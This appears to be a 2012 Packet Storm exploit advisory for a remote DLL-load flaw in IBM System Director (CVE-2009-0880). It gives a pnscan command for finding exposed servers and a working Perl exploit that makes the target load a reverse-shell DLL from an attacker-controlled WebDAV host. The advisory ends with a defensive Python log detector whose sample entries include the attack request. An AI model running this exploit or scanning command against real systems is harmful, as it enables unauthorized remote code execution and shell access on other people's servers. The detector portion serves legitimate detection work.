IBM System Director Remote DLL Load

Packet Storm ID: PACKETSTORM:118549
Author: Kingcope
Date: Dec 03, 2012
Source: packetstormsecurity.com
EPSS: 0.405 (percentile 97.3%)

IBM System Director Remote System Level Exploit (CVE-2009-0880 extended zeroday)
Copyright (C) 2012 Kingcope

IBM System Director listens on port 6988. By sending a special request to a vulnerable server, an attacker can force it to load a DLL remotely from a WebDAV share.

The following exploit loads the DLL from \\isowarez.de\director\wootwoot.dll. wootwoot.dll is a reverse shell that sends a shell back to the attacker (the code has to be inside the DLL initialization routine).
The IBM Director exploit works on versions 5.20.3 and before, but not on 5.2.30 SP2 and above.
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0880
There was a prior CVE for it; that CVE states the attack can load local files only, but by using a WebDAV server a remote file can be loaded too.
To scan for this software you can enter the following (using pnscan):

```shell
./pnscan -w"M-POST /CIMListener/ HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n\r\n" -r HTTP <ipblock> 6988
```

Exploit:

```perl
#!/usr/bin/perl
# IBM System Director remote DLL load (CVE-2009-0880 extended)
# 1st argument: target host
use strict;
use warnings;
use IO::Socket;

my $host = $ARGV[0] or die "usage: $0 <target host>\n";
my $sock = IO::Socket::INET->new(PeerAddr => $host,
                                 PeerPort => "6988",
                                 Proto    => 'tcp')
    or die "connect to $host:6988 failed: $!\n";

# A well-formed CIM-XML ExportIndication message; the listener parses it
# as an ordinary indication delivery.
my $payload =
qq{<?xml version="1.0" encoding="utf-8" ?>
<CIM CIMVERSION="2.0" DTDVERSION="2.0">
<MESSAGE ID="1007" PROTOCOLVERSION="1.0">
<SIMPLEEXPREQ>
<EXPMETHODCALL NAME="ExportIndication">
<EXPPARAMVALUE NAME="NewIndication">
<INSTANCE CLASSNAME="CIM_AlertIndication" >
<PROPERTY NAME="Description" TYPE="string">
<VALUE>Sample CIM_AlertIndication indication</VALUE>
</PROPERTY>
<PROPERTY NAME="AlertType" TYPE="uint16">
<VALUE>1</VALUE>
</PROPERTY>
<PROPERTY NAME="PerceivedSeverity" TYPE="uint16">
<VALUE>3</VALUE>
</PROPERTY>
<PROPERTY NAME="ProbableCause" TYPE="uint16">
<VALUE>2</VALUE>
</PROPERTY>
<PROPERTY NAME="IndicationTime" TYPE="datetime">
<VALUE>20010515104354.000000:000</VALUE>
</PROPERTY>
</INSTANCE>
</EXPPARAMVALUE>
</EXPMETHODCALL>
</SIMPLEEXPREQ>
</MESSAGE>
</CIM>};

# The handler path after /CIMListener/ is a UNC path. The vulnerable
# listener treats it as a DLL name, so the server fetches and loads
# \\isowarez.de\director\wootwoot.dll over WebDAV.
my $req =
  "M-POST /CIMListener/\\\\isowarez.de\\director\\wootwoot HTTP/1.1\r\n"
 ."Host: $host\r\n"
 ."Content-Type: application/xml; charset=utf-8\r\n"
 ."Content-Length: " . length($payload) . "\r\n"
 ."Man: http://www.dmtf.org/cim/mapping/http/v1.0 ; ns=40\r\n"
 ."CIMOperation: MethodCall\r\n"
 ."CIMExport: MethodRequest\r\n"
 ."CIMExportMethod: ExportIndication\r\n\r\n";
print $sock $req . $payload;

# Echo whatever the server answers.
while (<$sock>) {
    print;
}
```
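As an added defender-side example (not part of Kingcope's advisory), the following Python flags web-server or proxy log entries carrying the request pattern described above: an M-POST to /CIMListener/ whose handler path is a UNC share, plus the empty-path probe that the pnscan command sends. The log lines, IP addresses and host names are constructed, and percent-decoding the path before matching is an added assumption meant to catch encoded backslashes.

```python
"""Flag CIM listener requests that carry a UNC path (IBM Director DLL-load pattern)."""
import re
from urllib.parse import unquote

# Request line inside a combined-log entry: "METHOD TARGET HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z-]+) (?P<target>\S+) HTTP/(?P<ver>[\d.]+)"')
# A handler of the form \\host\share\... is a UNC path, i.e. a remote DLL source.
UNC_RE = re.compile(r'^\\\\(?P<host>[^\\]+)\\(?P<rest>.+)$')

# Constructed sample entries; the 10.0.0.x clients and host names are made up.
SAMPLE_LOG = r"""10.0.0.5 - - [03/Dec/2012:00:00:00 +0000] "M-POST /CIMListener/\\isowarez.de\director\wootwoot HTTP/1.1" 200 0
10.0.0.6 - - [03/Dec/2012:00:00:01 +0000] "M-POST /CIMListener/ HTTP/1.1" 200 0
10.0.0.7 - - [03/Dec/2012:00:00:02 +0000] "M-POST /CIMListener/%5C%5Cevil.example%5Cshare%5Cx HTTP/1.1" 200 0
10.0.0.8 - - [03/Dec/2012:00:00:03 +0000] "M-POST /CIMListener/localhandler HTTP/1.1" 200 0
10.0.0.9 - - [03/Dec/2012:00:00:04 +0000] "GET /index.html HTTP/1.1" 200 512
"""

def classify(entry: str):
    """Return (verdict, detail) for one log entry."""
    m = REQUEST_RE.search(entry)
    if not m:
        return ("unparsed", "")
    # Assumption: undo %5C-style encoding so encoded backslashes are not missed.
    target = unquote(m.group("target"))
    if not target.lower().startswith("/cimlistener/"):
        return ("benign", "")
    handler = target[len("/CIMListener/"):]
    unc = UNC_RE.match(handler)
    if unc:
        return ("remote-dll-load", unc.group("host"))
    if handler == "":
        return ("listener-probe", "")  # matches the pnscan fingerprint request
    return ("cim-indication", handler)

def scan_log(text: str):
    """Return [(client_ip, verdict, detail)] for every flagged entry."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        verdict, detail = classify(line)
        if verdict in ("remote-dll-load", "listener-probe"):
            findings.append((line.split()[0], verdict, detail))
    return findings

if __name__ == "__main__":
    for ip, verdict, detail in scan_log(SAMPLE_LOG):
        print(f"{ip}: {verdict} {detail}")
```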
  
Cheerio,

Kingcope